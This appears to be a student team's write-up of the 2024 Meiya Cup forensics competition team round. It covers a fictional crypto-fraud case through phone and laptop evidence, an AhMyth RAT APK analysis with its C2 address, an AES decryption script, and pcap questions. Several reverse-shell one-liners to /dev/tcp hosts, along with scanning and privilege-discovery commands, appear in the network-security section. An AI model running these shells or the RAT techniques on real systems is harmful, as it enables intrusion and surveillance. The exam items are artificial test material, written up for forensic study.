时光荏苒,白驹过隙,今年——2024年w3nx1z1、qui1t和tianya三位师傅终于迎来了他们的第三届美亚杯,不出意外的话,这是他们第三次参加美亚杯同时也是大学四年里最后一次参加美亚杯。在下午等待团体赛检材挂载密码发布时,w3nx1z1师傅还打趣到:”今年能整个二等奖就行啦哈哈哈“。要不是经过四个小时紧张刺激的战斗之后,发现由三位师傅组成的SeeUsec战队拿下了线上学生组第一名,他们差点就信了。

  每年美亚杯的题目质量都很高,但是今年的题目似乎做起来意外的比较顺手。下面是三位师傅简单整理的一份团体赛WP,欢迎师傅们来交流指正。

(注:本wp只是三位师傅个人的见解,仅作学习交流用,不代表正确答案,非官方wp,如果有写的不准确的地方师傅们轻喷。)

  1. [填空题]在个人赛的最后一部分,你对David的数字设备进行了取证检查,发现他与一名成员Alice有可疑的沟通。你现在分析Alice 的手机。 参考Alice_Mobile.bin,Alice所使用的手机网络运营商公司的名称是什么? (答案格式: 请用大写英文字母作答 ,无须留空白) (1分)

CSL

找到IMSI,前5位对应移动运营商的名称

搜索spn也找到了

  • [填空题]

参考Alice_Mobile.bin,Alice 所使用的谷歌电子邮件地址是? (答案格式: 请用小写英文字母作答,例如:abc@google.com) (2分)

alicecutter94@gmail.com

  • [单选题]

参考Alice_Mobile.bin,谁向Alice发送了一个含有个人资料的xlsx文件? (1分)

A. David
B. John
C. Ben
D. Amy
E. Harry

B

  • [填空题]承上题,参考Alice_Mobile.bin,该文件以MD5计算的哈希值是? (答案格式: 请用大写英文字母作答和用阿拉伯数字回答) (1分)

5457D5A68673B8D093D7666D515CCCB2

导出文件计算一下即可

  • [单选题]参考Alice_Mobile.bin, Alice于Facebook(脸书)所建立的群组? (1分)

A. 大学生炒散搵工群

B. 最全面搵工推介

C. 全港笋工好工推介2024

D. 搵工全职兼职

E. 搵工WhatsApp群

C

在和zhangwei的WhatsApp聊天记录中找到

  • [单选题]参考Alice_Mobile.bin, Alice在2024年8月15日于哪个地铁站和”客服人员”相约见面? (2分)

A. Chai Wan

B. Tai Koo

C. Wan Chai

D. Central

E. Mong Kok

C

直接搜索

  • [填空题]参考Alice_Mobile.bin,受骗女子欧凯被指示将虚拟货币转到哪个钱包地址? (答案格式: 大写英文字母, 小写英文字母及阿拉伯数字混合组成,例如: 0xDasdGJHI34twebGHJK2354YU34h) (2分)

0xdA9AE5b1bA2F404D0490dcd18a5C2247866FD148

  • [单选题]参考Alice_Mobile.bin, Alice指示”客服人员”使用什么交通工具离开香港? (1分)

A. 火车

B. 私家车

C. 飞机

D. 船

E. 货柜车

D

翻到群聊的最后就是

这个题目和最后的128-130题有关联

  • [填空题]参考Alice_Mobile.bin,客服人员”ZHANG WEI”的银行卡号是多少? (答案格式:用阿拉伯数字回答, 例如: 54613165456431) (2分)

62123465678987654321

zhangwei是alice在whatsapp中的联系人

  • [单选题]

参考Alice_Mobile.bin,Alice总共在脸书(FACEBOOK)上发布了多少张照片? (2分)

A. 1

B. 3

C. 5

D. 7

E. 9

  • [填空题]

参考Alice_Mobile.bin,应用程序WhatsApp的数据库 (database) 内, 哪个message_type代表发送的内容是表情包 (Sticker)? (答案格式:用阿拉伯数字回答) (3分)

  • [填空题]参考Alice_Mobile.bin,在Alice手机中,哪一个数据库(Database)记录了照片的数据? (答案格式:只需使用全部大写回答, 例如:ABC.DB) (2分)

EXTERMAL.DB

找张图片跳转到源文件,注意大写

  • [填空题]承上题,参考Alice_Mobile.bin,该文件的最后修改日期和时间 (Last Modified Time) 是? (答案格式:YYYY-MM-DD HH:MM:SS) (2分)

2024-08-30 17:28:29

同上题图

  • [单选题]从Alice的手机中发现,她一直与一名叫John的成员保持联系,你接着分析John的手机。 参考John_Smartphone_itunebackup.zip, 备份密码是「1234」, 回答以下题目: 在WhatsApp通讯软件内「三五成群」群组于什么时间创建? (2分)

A. 2024-08-29 17:44:38

B. 2024-07-25 15:22:09

C. 2024-07-30 12:45:50

D. 2024-07-30 16:15:34

C

使用给的密码1234来解密ios备份分析后能在群聊消息里面找到建群时间

  • [单选题]参考John_Smartphone_itunebackup.zip,照片IMG_007 的创建日期时间是? (2分)

A. 2024年8月14日星期三下午02:54

B. 2024年9月02日星期三下午12:54

C. 2024年8月14日星期三下午12:54

D. 2024年8月16日星期五下午12:54

C

图片中搜索IMG找到目标图片

  • [单选题]参考John_Smartphone_itunebackup.zip,John曾使用什么通讯软件联系Ben? (2分)

A. Reddit

B. WhatsApp

C. WeChat

D. Line

B

在取出来的聊天软件分析结果中找通讯录 在whatsapp中找到名为Ben的联系人

  • [填空题]参考John_Smartphone_itunebackup.zip,于“三五成群”群中, 电子表格文件”Personal_data.xlsx”是由哪一个电话号码发送到该群组的? (答案格式:只需要用阿拉伯数字回答,包含国际电话区号和电话号码,例如:85290001111) (2分)
85269711024

直接查看文件信息

  • [单选题]

他与一个叫Ben的人有可疑的沟通。你接着分析Ben的手机。 参考BeniPhone.zip,根据 Ben 手机内通讯软件的记录,”This is a RAT APK that allows us to control Android devices remotely, enabling data access, monitoring and manipulation through an interface”是在什么时间接收或发出的? (1分)

A. 由 Ben 于 2024-08-02 16:17:07 接收

B. 由 Ben 于 2024-08-05 15:53:37 发出

C. 由 Ben 于 2024-08-05 16:58:12 接收

D. 由 Ben 于 2024-08-05 17:22:47 发出

B

Ben和John的聊天记录,按理来说John手机上应该也有,搜一下试试

  • [单选题]参考BeniPhone.zip,根据 Ben 手机内的照片记录,”IMG_0011.PNG”是通过哪种方式生成的? (2分)

A. 从互联网下载

B. 手机拍摄

C. 手机截图

D. 以上皆不是

C

直接在Ben的iPhone手机文件夹中找到这张图片 判断是手机截图

  • [单选题]你发现了该犯罪团伙似乎有一个共同的聊天群,其中包含有关可疑资本管理(与虚拟货币相关)的更多线索。 参考该聊天群组对话分析,John,David及Alice筹集资金的目的是什么? (1分)

A. 建立一个网站给人投资虚拟货币

B. 建立一个网站用作行骗

C. 创建虚拟货币钱包用作洗黑钱

D. 写一个Android (APK)应用程序包用作沟通

共同聊天群就是“三五成群”

这个题目主要就是翻一下他们的聊天记录,团伙确实建立了一个网站用于行骗,但是分析下来感觉C可能性更高

赛后师傅们分享的时候也有提到网站搭建在筹集资金之前

  • [单选题]

参考該聊天群对话、David,Emma與Clara 的对话及IDFC的交易记录分析,哪一个虚拟货币地址储存John,David及Alice所筹集的IDFC? (3分)

A. 0xe90ad3f80e39e83b533eef3ed23c641ec51089c6

B. 0x04d079c7ace663bbe1d2c201072d63b036d16ccd

C. 0x10a4f01b80203591ccee76081a4489ae1cd1281c

D. 0x8155c0b8a0c95424f433d8ab6342086f0433e6c4

在个人赛David的电脑中有个记录有虚拟货币交易记录的表格

所以交易应该在14号左右

但是我们发现04、10、e9都有转入记录,我认为,04位置存储的代币最多,且e9有转出给04,可能是一个中转节点,因此我选择B

或者去比特币浏览器里查找也是可以的

注意:交易记录和链上的实际交易记录不符

B

  • [单选题]参考Alice_Mobile.bin,Alice 总共使用了多少个虚拟货币地址直接接收受害人的IDFC? (2分)

A. 1

B. 3

C. 6

D. 7

从客服群里搜0x

  • [多选题]參考David_Laptop.e01內找到的IDFC交易记录,在收取受害人的IDFC后,它之后会再流向哪些虚拟货币地址? (2分)

A. 0xb2e3dbea311511ec5bda3e85e061f15366f888a6

B. 0x70544880875fe907cee383873ca58da23378caa5

C. 0x152c90200be61a540875f2a752c328bd19dbfb87

D. 0x59eb2c55eefdd4d8af2886c9fd8fc6f465c3e220

做个图一目了然,地址为了好记只取前两位

对于b2节点,我们从时间上可以发现,10节点的代币是筹集资金的时候传进去的,和诈骗无关

且在Alice手机的聊天记录中有三个收钱账户存在,和上图交易记录对应

显然是BCD

  • [单选题]承上题,上述IDFC去到那些地址后,谁掌管这些IDFC? (提示:分析IDFC的交易记录及个人赛所搜集的证据) (2分)

A. Alice (回復種子:pumpkin fold behind captain shoulder demand print hospital like smoke gate weird)

B. Ben (回復種子:wrap muscle rhythm stamp bundle zebra gorilla shuffle common tattoo ginger awake)

C. John (回復種子:abandon among anxiety pizza evidence face quiz ripple nerve pact nasty unveil)

D. David (回復種子:stock avocado grab clay light sadness segment ancient toe talk elder oil)

D

  • [单选题]2024年9月,Tom Victor带同其秘书Amy来到警署报案,称其秘书被骗子用人工智能视频在2024年8月29日早上骗去10,000,000 IDFC,请找出该交易的交易哈希(Transaction Hash) ? (2分)

A. 0x04dcfbb681e125076c7f3c79ddee7e2b4859881ad031e90cf7fc251a483dd92d

B. :0x04dcfbb681e125076c7f3c79ddee7e2b4859881ad031e90cf7fc251a4835792a

C. 0x04dcfbb681e125076c7f3c79ddee7e2b4859881ad031e90cf7fc251a4835792d

D. 0x04dcfbb681e125076c7f3c79ddee7e2b4859881ad031e90cf7fc251a4835792c

最后一条转账记录的交易hash

这里我发现所有的资金都是从72节点起步的,可能出题的时候不想弄得太过复杂,仿的有漏洞,因此这个交易记录看看就好

0x04dcfbb681e125076c7f3c79ddee7e2b4859881ad031e90cf7fc251a4835792d

  • [多选题]就現時搜集到的證據、David_Laptop_64GB.e01内的资料及IDFC的资金流分析,下列哪些虚擬货币地址是最終诈骗集团儲存犯罪所得的地址? (3分)

A. 0x63a8ba1df0404ee41f7c6af8efd2f54006f32042

B. 0xe90ad3f80e39e83b533eef3ed23c641ec51089c6

C. 0x10a4f01b80203591ccee76081a4489ae1cd1281c

D. 0x90f73497e4446f6cf9881213c32d6af66d799fe5

综合分析,63,90为犯罪所得

APK部分

太好了,是只有java层的ezre,我们有救了(bushi)

  • [单选题]你现在查看Ben的笔记本电脑,并发现了 APK 文件。 一般而言,APK 的关键组成部分是什么? (3分)

A. AndroidManifest.xml, classes.dex, resources.arsc, res/

B. AndroidManifest.xml, META-INF/, res/, assets/

C. classes.dex, lib/, AndroidManifest.xml, META-INF/

D. res/, assets/, AndroidManifest.xml, classes.dex

A

基础知识

  • [单选题]参考Ben_Laptop.zip内的Joshe Investment.apk, 这个 APK 没有 classes.dex 文件,而是有 smali 文件,以下哪一个陈述是正确的? (3分)

A. 这是一个經過反向工程製作的 APK

B. 该 APK 已损坏

C. 文件结构不完整

D. APK 包含加密代码

A

smali文件是 Android Dalvik 字节码的汇编代码,它们是由classes.dex反编译得到的

  • [单选题]参考Ben_Laptop.zip内的Joshe Investment.apk, Ben 使用了哪个工具包生成恶意APK 以控制受害者的设备? (1分)

A. Metasploit

B. SpyNote

C. QuasarRAT

D. AhMyth

D

jdax反编译之后全局搜索,只有AhMyth

  • [单选题]参考Ben_Laptop.zip内的Joshe Investment.apk,确认哪个 .xml 文件被特别添加为主活动(activity_main)的布局文件? (3分)

A. activity_main.xml

B. main_activity.xml

C. main.xml

D. Thisismain.xml

D

MainActivity类的onCreate方法设置了布局文件,通过setContentView(R.layout.Thisismain)方法调用来指定的,表明Thisismain是一个布局文件的资源ID

  • [单选题]参考Ben_Laptop.zip内的Joshe Investment.apk, 确认被指定为主活动层(activity main layer) .xml 文件的公共 ID? (3分)

A. 0x7f040000

B. 0x7f050000

C. 0x7f060000

D. 0x7f070000

承上题,全局搜索thisismain

  • [单选题]参考Ben_Laptop.zip内的Joshe Investment.apk,确认应用程序没有要求的权限? (3分)

A. android.permission.READ_CONTACTS

B. android.permission.USE_FINGERPRINT

C. android.permission.WRITE_CALENDAR

D. android.permission.ACCESS_FINE_LOCATION

一开的思路是直接去搜,但是BC选项都不吻合。

其中C选项相关在apk中只找到了android.permission.READ_CALENDAR

  • [单选题]参考Ben_Laptop.zip内的Joshe Investment.apk,ahmyth/mine/king/ahmyth/ 文件夹下的 b.smali 文件的主要功能是什么? (3分)

A. 管理网络连接

B. 处理相机操作并捕捉图像

C. 管理应用程序设置

D. 处理数据库操作

B

跳转到b.smali,满篇都是camera

  • [单选题]参考Ben_Laptop.zip内的Joshe Investment.apk,在 ahmyth/mine/king/ahmyth/ 文件夹下的 b.smali 文件中,字节数组(Byte Array)在发送到服务器之前执行了哪一系列操作,最终的图像格式是? (3分)

A. 字节数组被译码、加密、转换为 PNG 格式,并发送到服务器

B. 字节数组被译码、压缩成 JPEG 格式,并封装到 JSONObject 中再发送到服务器

C. 字节数组被编码为 String,压缩成 BMP 格式,转换为字节数组并发送

D. 字节数组被编码为 String,压缩成 JPEG 格式,转换为字节数组并发送

B

相关代码在e方法里面

  • [单选题]参考Ben_Laptop.zip内的Joshe Investment.apk, 在 ahmyth/mine/king/ahmyth/ 文件夹下的b.smali文件中,图像在发送到服务器時的压缩比率是多少? (6分)

A. 50%

B. 30%

C. 20%

D. 10%

同上题图

  • [单选题]参考Ben_Laptop.zip内的Joshe Investment.apk,在 ahmyth/mine/king/ahmyth/ 文件夹下的 ConnectionManager.smali 中,sendReq method 的目的是什么? (6分)

A. C2 服务器向受感染的设备发送请求

B. 处理用户接口的更新

C. 建立到 C2 服务器的网络连接

D. 管理应用程序设置

C

sendReq 方法获取一个 b.a.b.e 类型的对象,并注册了两个事件处理器:

  • 处理 “ping” 事件的 b 类实例

  • 处理 “order” 事件的 c 类实例

  • [单选题]承上题,参考Ben_Laptop.zip内的Joshe Investment.apk,C2服务器的 IP 地址及端口号? (6分)

A. IP:192.168.1.1:8080

B. IP:10.0.0.1:80

C. IP:172.16.0.1:443

D. IP:59.152.211.11:4444

D

首先排除法:

ABC属于三个常见的私有IP地址范围内,这三个地址被保留用于局域网中的私有网络,不会在互联网中路由,排除就可以直接得到答案

其次静态分析:

结合上一问sendReq 方法中获取了 b.a.b.e 类型的对象,很可能是一个网络连接对象

跟进到e类发现了一段base64解码

解码可得

最后是尝试抓包,使用沙箱研判也可以得到

  • [单选题]参考Ben_Laptop.zip内的Joshe Investment.apk, ahmyth/mine/king/ahmyth/ 文件夹下的 g.smali 文件中,MediaRecorder 被初始化用于录音。如果 setAudioSource() 方法使用了错误的参数,会发生什么,且这将如何影响录音过程的功能? (6分)

A. 应用将以默认设置继续录音,但音质可能会降低

B. MediaRecorder 会抛出 IllegalStateException,并阻止录音的开始

C. 录音将继续,但文件格式将与指定的输出格式不兼容

D. 应用只会在调用 start() 方法后由于无效的音频编码而崩溃

B

setAudioSource() 方法用于设置音频源,该方法需要传递一个有效的音频源常量。

如果 setAudioSource() 传入了错误的参数,MediaRecorder 将无法正确初始化,通常会导致抛出一个异常。

  • [单选题]参考Ben_Laptop.zip内的Joshe Investment.apk, ahmyth/mine/king/ahmyth/ 文件夹下的 g.smali 文件中,TimerTask 用于在启动 MediaRecorder 后调度动作。TimerTask 在这个过程中有什么作用? (6分)

A. 它以设定的间隔暂停录音,以更好地管理资源

B. 它通过在设定的间隔调整录音参数来提高音质

C. 它定期压缩录制的音讯文件以节省存储空间

D. 它监控录音时长,并根据录音时间安排事件

D

TimerTask 的具体实现类是 g.a,用于在定时任务触发时执行一些清理操作。

TimerTask 的定时任务触发时会停止并释放 MediaRecorder,然后处理录制的文件。

  • [单选题]参考Ben_Laptop.zip内的Joshe Investment.apk, 在 ahmyth/mine/king/ahmyth/ 文件夹下的 h.smali 文件中,method a() 和method b() 的主要功能有什么区别? (6分)

A. Method a() 是检索存储在设备上的联系人清单并将其格式化为 JSONArray,而 method b() 是从被入侵的设备向联系人发送消息

B. Method a() 是收集收件箱中的所有 SMS 短信,而 method b() 是利用被入侵的设备发送 SMS 短信

C. Method a() 是向指定的电话号码发送包含自定义消息内容的 SMS 短信,method b() 是接收发送确认

D. Method a() 是从设备中检索 MMS 短信,而 method b() 是使用被入侵的设备发送 MMS 短信

B

首先Method a()

通过 ContentResolver 访问设备的短信收件箱 (content://sms/inbox)并使用 Cursor 查询短信记录。

使用 while (query.moveToNext()) 遍历查询结果。对于每条短信记录,提取发件人号码 (address) 和短信内容 (body)。

其次Method b(String str, String str2):

使用 SmsManagersendTextMessage 方法发送短信

总之就是一个收一个发

  • [单选题]参考Ben_Laptop.zip内的Joshe Investment.apk, 在 ahmyth/mine/king/ahmyth/ 文件夹下的 h.smali 文件中,method b() 需要哪些参数? (6分)

A. method b() 请求两个字符串参数, 联系人姓名和联系人号码

B. method b() 请求一个文件路径的字符串参数和一个数据内容的字符串参数

C. method b() 请求一个 URL 的字符串参数和一个负载数据的字符串参数

D. method b() 请求两个字符串参数, 接收者的电话号码和消息内容

D

考的基础知识

smsManager.sendTextMessage(destinationAddress, scAddress, text, sentIntent, deliveryIntent)  

  • destinationAddress: 收件人号码 

  • scAddress: 短信中心服务号码, 这里设置为null 

  • text: 发送内容

  • sentIntent: 发送短信结果状态信号(是否成功发送),new 一个Intent , 操作系统接收到信号后将广播这个Intent.此过程为异步.

  • deliveryIntent: 对方接收状态信号(是否已成功接收).

加密脚本部分

  • [单选题]在分析Ben的笔记本电脑时,你从调查人员那里获得了以下信息:在对一名被捕的犯罪集团成员进行审问时获得的情报显示,Ben对John心怀怨恨,因为John扣留了Ben的犯罪收益份额。因此,Ben加密了John的机密文件夹,以限制他的访问。 参考Ben_Laptop.zip,解密secretExcel.encrypted的第一步应该是什么? (2分)

A. 生成新的随机密钥

B. 打开加密文件并读取文件的前 16 个字节

C. 压缩加密档

D. 删除加密档

B

首先要找一下题目说的secretExcel.encrypted文件

在桌面的Personal Data文件夹中 找三个一个是题目提到的被加密的文件 一个是加密脚本 一个是密钥文件

先看一下加密脚本 

import os
import sys
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad

def encrypt_file(file_path, password):
    salt = get_random_bytes(32)
    
    key = PBKDF2(password, salt, dkLen=32, count=100000000)

    file_path = os.path.abspath(file_path)
    
    output_dir = os.path.dirname(file_path)
    folder_name = os.path.splitext(os.path.basename(file_path))[0]
    encrypted_path = os.path.join(output_dir, f"{folder_name}.encrypted")
    
    os.makedirs(os.path.dirname(encrypted_path), exist_ok=True)
    
    with open(file_path, 'rb') as f_in, open(encrypted_path, 'wb') as f_out:
        data = f_in.read()
        cipher = AES.new(key, AES.MODE_CBC)
        
        f_out.write(cipher.iv)
        f_out.write(salt)
        
        encrypted_data = cipher.encrypt(pad(data, AES.block_size))
        f_out.write(encrypted_data)
    
    print(f"File encrypted successfully: {encrypted_path}")

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: python encrypt.py <file_path> <password>")
        sys.exit(1)

    file_path = sys.argv[1]
    password = sys.argv[2]
    
    encrypt_file(file_path, password)

关键的解密步骤在于这里

随机生成的16字节iv被放在了加密文件的前16字节 随机生成的32字节盐值放在了后面的32字节也就是加密文件的(17-48字节) 后面是读取源文件的内容 使用iv和盐值进行加密。因此解密的第一步应该是打开加密文件并读取文件的前 16 个字节

  • [单选题]参考Ben_Laptop.zip,在加密文件secretExcel.encrypted中,初始向量 (Initial Vector) 的值是什么? (2分)

A. 64f4e21c1e4cc3a60137da79e75bf973

B. a6b7e84f91827c3d2a94bfed7b5ca9d1

C. 3b29d2a46aab93bba07c6893d1b8e93a

D. 7f8d9b2a14c5aef3786d12c4b6e2d4f9

A

使用010打开加密文件 前16字节就是iv

  • [单选题]参考Ben_Laptop.zip,在加密文件secretExcel.encrypted中,盐值 (SALT) 是什么? (2分)

A. 5d5ca840accf95169288de5bf85dacd7bb05ad888afac26efd05cc436c4a5424

B. a3d9f0e4b7c8d5a9c2e7f0b3a5d7c6b1b8e7a2f9c3d1e4f5a6b9c0d7e1f2b4c8

C. f2e1d0c9b8a7f6e5d4c3b2a1e8f7d6c5b4a3d2f1e0c9b8a7d6e5c4b3a2f1e0d9

D. c7b6a5d4e3f2d1c0e9d8b7a6f5e4d3c2b1a0e9f8d7c6b5a4b3c2d1e0f9e8d7c6

A

按照第42题分析 第17-第48字节是盐值

  • [单选题]参考Ben_Laptop.zip,查看 ‘encrypt.py’代码,如果更改’PBKDF2’ 的 ‘count’ 参数会产生什么影响? (2分)

A. 仅影响解密时所需的计算性能

B. 仅影响加密的安全性

C. 同时影响所需的计算性能和安全性

D. 没有影响

C

PBKDF2函数被用来从密码和盐生成加密密钥。PBKDF2 函数的count参数指定了迭代次数,表示进行密码派生时对哈希函数的迭代次数,因此增加count参数的值会导致进行更多次数的哈希迭代,增加所需的计算机性能,同时增加迭代次数可以有效增加爆破的难度,提高加密的安全性。

  • [单选题]参考Ben_Laptop.zip,根据分析及计算后,解密secrectExcel.encrypted所用的key具体值是什么? (3分)

A:b’\xb2T\xc2\xb9\xb7wf9\x95Y\xcc)\xec\xff\x0e\xb6\xf6\x03\x92z\xc6\xe4\x11P\x07@\x94\xbcl\xfd\x95\xc5’;
B:b’/T_\r\x1e\xb8\xe6_\xcd\x01\x95\xde\xb8\r\xb3\xb6\\nVp\xeb\xf1S\xb4m\xd6wH\xc4\xc8\xcf\xed’;
C:b’\xea\x15\xf9\x05\x85\xe8h\x87\xc4\xf0O\x8a\xba1\x96\x05b\xf9\xa3g\xbaMm\xa4\t,\xe0Q\x87\x8e\xfb\x8c’;
D:b’q!\xae2\x1fvo\xb6]\xfb\x1f\x8c\xe5\x18\x03\x0b\xcc\xc93\xf7/us\x8a\x1e;\xd2\xe3\x81\x05\xaa\x04’

D

这一行就是生成密钥的代码

key = PBKDF2(password, salt, dkLen=32, count=100000000)

password在同文件夹下的password.txt中

from Crypto.Protocol.KDF import PBKDF2
password = "iwillnottellyouthepassworduntiligetthemoney"
salt = "5d5ca840accf95169288de5bf85dacd7bb05ad888afac26efd05cc436c4a5424"
salt = bytes.fromhex(salt)
key = PBKDF2(password, salt, dkLen=32, count=100000000)
print(key)

生成的时候需要将salt从16进制转为字节 得到原始密钥为

b'q!\xae2\x1fvo\xb6]\xfb\x1f\x8c\xe5\x18\x03\x0b\xcc\xc93\xf7/us\x8a\x1e;\xd2\xe3\x81\x05\xaa\x04'
  • [单选题]参考Ben_Laptop.zip,解密后的 Excel 文件中,程琳的电话号码是什么? (3分)

A. +852 106523728123

B. +852 180300901529

C. +60 243428690343

D. +63 060940949159

A

写解密脚本解密加密的excel文件

import os
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

def decrypt_file(file_path, key):
    with open(file_path, 'rb') as f_in:
        iv = f_in.read(16)  
        salt = f_in.read(32) 
        encrypted_data = f_in.read()  

    cipher = AES.new(key, AES.MODE_CBC, iv)
    decrypted_data = unpad(cipher.decrypt(encrypted_data), AES.block_size)

    output_dir = os.path.dirname(file_path)
    folder_name = os.path.splitext(os.path.basename(file_path))[0]
    decrypted_path = os.path.join(output_dir, f"{folder_name}_decrypted.xlsx")

    with open(decrypted_path, 'wb') as f_out:
        f_out.write(decrypted_data)
    
    print(f"File decrypted successfully: {decrypted_path}")

if __name__ == "__main__":
    encrypted_file_path = 'secretExcel.encrypted'  
    key = b'q!\xae2\x1fvo\xb6]\xfb\x1f\x8c\xe5\x18\x03\x0b\xcc\xc93\xf7/us\x8a\x1e;\xd2\xe3\x81\x05\xaa\x04'

    decrypt_file(encrypted_file_path, key)

  • [填空题]参考Ben_Laptop.zip,解密后的 Excel 文件中,周亮的ID/Passport Number是什么? (提示:只需使用阿拉伯数字回答) (3分)
510800196504216464

网络安全知识部分

  • [单选题]根据可能难以破解的加密,你意识到Ben对黑客技术有深入的了解。请回答以下问题,以便了解Ben的运作。 Ben想要有效地搜索信息。他可以使用以下哪个Google高级搜索运算符来搜索某个特定网站? (2分)

A. [related:]

B. [inurl:]

C. [site:]

D. [info:]

C
  • [单选题]参考材料1.pdf,Ben试图入侵一个系统,他尝试在系统中打开HTTP服务器。 使用Python内置的http.server模块启动基本HTTP服务器的命令是什么,以便攻击者从目标机器下载文件? (1分)

A. python3 -m http.server9000

B. python3 -a http.server9000

C. python3 -r http.server9000

D. python3 -m http.server8000

A

查看1.pdf 看到端口是9000

  • [单选题]参考材料2.pdf,Ben准备了几个用于黑客攻击的脚本,这段代码的攻击目的是什么? (4分)

A. 拒绝服务

B. 缓冲区溢出

C. 建立反向 shell

D. 勒索软件

B

看到&#x20;

需要268字节来填充缓冲区 判断为缓冲区溢出

  • [单选题]Ben准备了几个用于黑客攻击的脚本。参考材料3.pdf,他采用了什么技术来保护代码? (2分)

A. 加密

B. 代码混淆

C. 隐写术

D. 编译

B

一眼php混淆

  • [单选题]参考材料4.pdf,他利用了什么方法来获取反弹shell(Reverse shell)? (2分)

A. 中间人攻击

B. 暴力破解

C. 缓冲区溢出

D. 文件上传

D

看到url里面的uploads路径 判断为文件上传来反弹shell

  • [单选题]参考1.pcap,Ben使用了哪些命令来扫描目标机器(提示:Ubuntu)? i) arp-scan -l ii) nmap -p1-65535 -sV -sC -O iii) nmap -Sx iv) nmap -sS (4分)

A. i&ii

B. ii&iii

C. iii&iv

D. 以上皆是

A

首先第三个是无效命令 所以BCD都不选 选A 在来看一下第二个的意思

扫描目标主机的所有端口(1-65535)。
尝试识别每个开放端口上运行的服务及其版本。
执行默认的安全脚本以发现潜在问题。
尝试识别目标主机的操作系统类型和版本

同时也在流量包1中找到大量arp的包 所以可能使用了命令1来扫描目标机器

  • [单选题]参考2.pcap,第56号数据包的代码功能是什么? (4分)

A.&#x20;

清除记录

B.&#x20;

拒绝服务

C.&#x20;

测试注入漏洞

D.&#x20;

反向外殼 (Reverse Shell)

D

在流量包2中看一下第56个包 追踪tcp流 在User-Agent中看到一个反弹shell的命令

  • [填空题]参考1.pcap,当Ben成功进入目标系统时,攻击者获取的账户? (答案格式:请使用小写英文字母作答) (4分)
root

直接在流量包1中追踪tcp流 翻到最后一个包 找到了攻击者成功拿到shell之后执行命令的内容

看到此时的用户是root

  • [单选题]Ben正在尝试入侵一个系统,并且他正在进行开源研究,他发现 nc -lvp 9000 将被用来连接到反弹shell (Reverse Shell),Ben将使用什么命令来创建反弹shell (Reverse Shell)?&#x20;

i) 0<&196;exec 196<>/dev/tcp/10.10.10.10/9000;sh <&196 >&196 2>&196&#x20;

ii) exec 5<>/dev/tcp/10.10.10.10/9000;cat <&5 | while read line; do $line 2>&5 >&5; done&#x20;

iii) /bin/bash -i >& /dev/tcp/192.168.217.139/4444 0>&1&#x20;

iv) sh -i 5<> /dev/tcp/10.10.10.10/9000 0<&5 1>&5 2>&5 (4分)

A. i

B. ii

C. iii

D. iv

D
  • [填空题]参考材料5.pdf,Ben输入了“find / -perm -4000 2>/dev/null”后,显示了材料5.pdf的內容,這些內容所显示的内容除具有执行权限,还设置了什么? (答案格式:请以大写英文字母作答输入答案) (4分)
SUID

这条命令就是用来查看有suid特殊权限的文件的

  • [单选题]Ben发现了下面的命令import pty; pty.spawn(“/bin/bash”),它的功能是? (4分)

A. 在 shell 中导入 Python 函数

B. 允许 shell 执行 Python 命令

C. 获取比 www-data 用户更高权限的交互式 shell

D. 以上皆不是

D

就是创建一个当前用户下的可交互的shell 不能提升权限&#x20;

Ben的笔记本部分

  • [填空题]你注意到Ben的笔记本电脑上安装了暗网 Tor,请回答以下问题。 Ben应该输入什么命令来在 Kali Linux 中执行 Tor 浏览器? (答案格式:小写英文字母和符号’-‘混合作答,例如:abc-def) (4分)
tor-browser
  • [单选题]

参考Ben_Laptop.zip,Ben经常使用 Tor 浏览器,该 Tor 浏览器把多少个 .onion 链接添加为书签? (2分)

A. 1

B. 2

C. 3

D. 4

D

比较迷惑的一道题 从取证软件和我进行仿真查看书签记录的结果来看 明显是超过四个 只能选择最多的了

  • [单选题]在检查Ben的记录时,发现了Port 9151的连接,那是指Ben在使用什么浏览器? (2分)

A. Chrome

B. Tor

C. Duckduckgo

D. Edge

B

9151端口经常被用于控制tor浏览器的本地SOCKS代理端口

  • [判断题]参考材料6.pdf,应该保持默认设置,以便 Firefox 浏览器使用 Tor 网络? (2分)

&#x20;正确

&#x20;错误

正确

proxychains 正在使用 Tor 网络(通过 127.0.0.1:9050)进行代理。通常,Firefox 浏览器使用 Tor 网络时,应该保持默认的 proxychains 配置,确保 Firefox 流量通过 Tor 网络传输,而不直接连接到互联网。

因此保持默认设置是合适的,以确保 Firefox 浏览器通过 Tor 网络使用代理。

  • [单选题]参考Ben_Laptop.zip,Ben使用 OpenVPN 5.196.64.231 多少天? (答案格式:只需使用阿拉伯数字回答) (2分)

A. 1

B. 2

C. 3

D. 4

B

这题是选择找到openvpn的日志文件

导出后查看 发现只有2024年8月10日和2024年8月16日两天的日志记录 判断使用openvpn5.196.64.231两天

  • [填空题]参考Ben_Laptop.zip,他使用了哪种算法加密密码? (答案格式:大写英文字母和符号’-‘ 混合组成) (2分)
AES-256-CBC

这题选择查看openvpn的配置文件config.json 导出查看找到AES-256-CBC

  • [单选题]在2024年8月16日17:40:06,发生了什么? i) 无法在套接字(socket)上执行操作 ii) 系统缺乏足够的缓冲区空间 iii) 队列(queue)已满。 (提示: 1)套接字是用于网络通信的编程接口,允许程序在网络上发送和接收数据, 2) 队列已满是程序试图将更多的元素插入到一个已经达到容量上限的队列中) (2分)

A. i&ii

B. ii & iii

C. i&iii

D. 以上皆是

D

这题依旧是翻日志 找到题干中说的时间 对应中这部分内容

这行英文翻译过来其实就是题干中的i、ii、iii描述

  • [单选题]调查员把一只属于Ben的U盘和一张SD卡交给了你进行分析。 参考Ben_USB.e01,是什么导致了“满汉全席.jpg”和“满汉全席Secret.jpg”之间的大小差异? (2分)

A. 档案嵌入其中

B. 像素差异

C. MAC 时间更改

D. 错误的档扩展名

A

太好了,是misc,我们有救了(bushi)

取证大师里面找到这两个文件 提取出来

放010里面看一下 很明显后面多了一个文件

  • [填空题]参考BenSDCard.e01,Ben的SD卡的解密密码是? (2分)
IamRich123!

接上题 从满汉全席Secret.jpg后面提出来一个doc文件 里面有bitlocker密钥和解密密码

  • [填空题]参考Ben_Laptop.zip,在2024/08/23 14:54:59 UTC+8,Ben 浏览了哪个网站? (答案格式: “https://xxxxxx.com/“) (1分)
https://teamviewer_internal/

在edge浏览器中找到题干所说时间的历史记录

